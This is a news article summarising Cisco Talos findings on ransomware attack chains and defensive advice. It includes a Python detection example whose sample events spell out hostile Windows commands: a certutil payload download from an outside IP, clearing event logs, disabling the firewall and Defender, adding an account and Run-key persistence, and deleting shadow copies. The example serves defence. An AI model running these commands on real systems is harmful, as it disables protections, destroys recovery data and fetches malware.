Cisco Talos analyzes attack chains, network ransomware tactics

To avoid detection, ransomware actors employ “defense evasion methods” such as disabling or modifying security software, including anti-virus programs and endpoint detection solutions. “They also often try to disable security features in the operating system to prevent the detection of the ransomware payload,” Nutland wrote. “Adversaries will also often obfuscate malicious software by packing and compressing the code, eventually unpacking itself in memory when executed. They’ll also modify the system registry to disable security alerts, configure the software to execute at startup, or block certain recovery options for users.”

Talos noted a number of additional ransomware trends, including:

  • MFA exploits: “Adversaries may send emails containing malicious attachments or URL links that will execute malicious code on the target system, deploying the actors’ tools and malware, and exploiting multi-factor authentication (MFA). There are many ways adversaries hope to bypass MFA, whether because of poor implementation or because they already have valid account credentials. Most notably, we have seen an increasing number of ransomware affiliates attempting to exploit vulnerabilities or misconfigurations in internet-facing systems, such as in legacy or unpatched software.”
  • Seeking long-term access: “…actors will look to establish long-term access, ensuring that their operations will be successful even if their initial intrusion is discovered and remediated. Attackers often use automated malware persistence mechanisms, such as AutoStart execution upon system boot, or modify registry entries. Remote access software tools can also be deployed, and local, domain and/or cloud accounts created, to establish secondary credentialed access.”
  • Enumerating target environments: “Upon establishing persistent access, threat actors will then attempt to enumerate the target environment to understand the network’s structure, locate resources that can support the attack, and identify data of value that can be stolen in double extortion. Using various local utilities and legitimate services, they exploit weak access controls and elevate privileges to the administrator level to progress further along the attack chain.”
  • Using network scanner utilities: “We have observed the popular use of many network scanner utilities in conjunction with local operating system tools and utilities (living-off-the-land binaries) like Certutil, Wevtutil, Net, Nltest and Netsh to blend in with typical operating system functions, exploit trusted applications and processes, and aid in malware delivery.”
  • Double extortion: “In the shifting focus to a double extortion model, many adversaries collect sensitive or confidential information to send to an external adversary-controlled resource or over some C2 mechanism. File compression and encryption utilities WinRAR and 7-Zip have been used to conceal files for the unauthorized transfer of data, while adversaries often exfiltrate files using the previously mentioned legitimate RMM tools. Custom data exfiltration tools have been developed and used by the more mature RaaS operations, offering custom tooling such as Exbyte (BlackByte) and StealBit (LockBit) to facilitate data theft.”
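The tradecraft quoted in the bullets above (disabling security tooling and recovery options, Run-key persistence, local account creation, and living-off-the-land discovery with certutil, wevtutil, net, nltest and netsh) is what an EDR or SIEM rule set has to pick out of ordinary process-creation telemetry. The Python below is an added example written for this page, not Talos code or tooling from the report: it runs a small argument-based rule set over constructed Sysmon Event ID 1 / Security 4688 style events (every command line, hostname and IP is made up), and deliberately includes three benign uses of the same binaries to show why the rules must key on arguments rather than on the binary name.

```python
"""Detection logic for the tradecraft quoted above (defense evasion, persistence,
living-off-the-land discovery), run over constructed process-creation events.
Added example, not Talos code; every event and rule here is illustrative."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    tactic: str
    event_id: int
    command_line: str


# Constructed sample events shaped as (EventID, CommandLine), i.e. Sysmon ID 1 or
# Security 4688 process creation. Not real telemetry. The last three are benign
# uses of the same binaries, which is why the rules key on arguments, not images.
SAMPLE_EVENTS = [
    (1, r"certutil.exe -urlcache -split -f http://198.51.100.7/update.bin C:\Users\Public\upd.exe"),
    (1, r"wevtutil.exe cl Security"),
    (1, r"nltest /dclist:corp.example"),
    (1, r"netsh advfirewall set allprofiles state off"),
    (1, r"net user svc_backup P@ssw0rd! /add"),
    (4688, r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d C:\Users\Public\upd.exe /f'),
    (1, r"vssadmin delete shadows /all /quiet"),
    (1, r"bcdedit /set {default} recoveryenabled No"),
    (4688, r'powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true"'),
    (1, r"certutil -hashfile C:\tools\agent.msi SHA256"),   # benign: hashing an installer
    (1, r"wevtutil qe Security /c:5 /f:text"),              # benign: querying, not clearing
    (1, r"netsh interface show interface"),                 # benign: listing interfaces
]

# (rule name, tactic, regex on the command line). Tactic labels follow MITRE ATT&CK.
RULES = [
    ("certutil_download", "Command and Control", r"\bcertutil(\.exe)?\b.*-urlcache\b"),
    ("defender_realtime_disabled", "Defense Evasion", r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true\b"),
    ("event_log_cleared", "Defense Evasion", r"\bwevtutil(\.exe)?\s+cl\b"),
    ("firewall_disabled", "Defense Evasion", r"\bnetsh(\.exe)?\s+advfirewall\s+set\s+\S+\s+state\s+off\b"),
    ("dc_enumeration", "Discovery", r"\bnltest(\.exe)?\s+/dclist\b"),
    ("local_account_created", "Persistence", r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b"),
    ("run_key_added", "Persistence", r'\breg(\.exe)?\s+add\s+"?HK(LM|CU)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b'),
    ("shadow_copies_deleted", "Impact", r"\bvssadmin(\.exe)?\s+delete\s+shadows\b"),
    ("recovery_disabled", "Impact", r"\bbcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no\b"),
]
COMPILED = [(name, tactic, re.compile(pat, re.IGNORECASE)) for name, tactic, pat in RULES]
PROCESS_CREATION_IDS = {1, 4688}


def match_event(event_id: int, command_line: str) -> list[Finding]:
    """Findings for one event; events that are not process creations are ignored."""
    if event_id not in PROCESS_CREATION_IDS:
        return []
    return [Finding(name, tactic, event_id, command_line)
            for name, tactic, rx in COMPILED if rx.search(command_line)]


def scan(events) -> list[Finding]:
    """Run every rule over every (EventID, CommandLine) pair."""
    return [f for event_id, cmd in events for f in match_event(event_id, cmd)]


def distinct_tactics(findings) -> set[str]:
    """Breadth across tactics is the chain signal: a single LOLBin hit is often an
    admin, while one host touching evasion, persistence and recovery inhibition
    in the same window is the attack chain described in the report."""
    return {f.tactic for f in findings}


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for f in hits:
        print(f"[{f.tactic:>19}] {f.rule:<26} {f.command_line}")
    print(f"{len(hits)} findings across {len(distinct_tactics(hits))} tactics")
```

In a real deployment the same rules would be expressed in the SIEM or EDR query language and correlated per host over a short window, so that the tactic breadth computed by `distinct_tactics` raises the alert rather than each individual command line; the three benign samples should produce no findings at all.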

Earlier this year Talos wrote that bad actors who are perpetrating advanced persistent threat (APT) attacks aren’t just looking to access your network. They want to sneak in and hang around to collect valuable data or lay plans for future attacks. Post-compromise threats are growing, and they’re aimed largely at aging network infrastructure and edge devices that are long past end of life and may carry critical unpatched vulnerabilities.

Some of the things businesses can do to combat ransomware attacks include regularly and consistently applying patches and updates to all systems and software to address vulnerabilities promptly and reduce the risk of exploitation, according to Nutland. “Implement strong password policies that require complex, unique passwords for each account. Additionally, enforce multi-factor authentication (MFA) to add an extra layer of security,” Nutland stated.

Nutland also recommended segmenting the network to isolate sensitive data and systems, preventing lateral movement in case of a breach, and utilizing network access control mechanisms such as 802.1X to authenticate devices before granting network access, ensuring that only authorized devices can connect.

“Implement a Security Information and Event Management (SIEM) system to continuously monitor and analyze security events, in addition to the deployment of EDR/XDR solutions on all clients and servers to provide advanced threat detection, investigation, and response capabilities,” Nutland wrote.
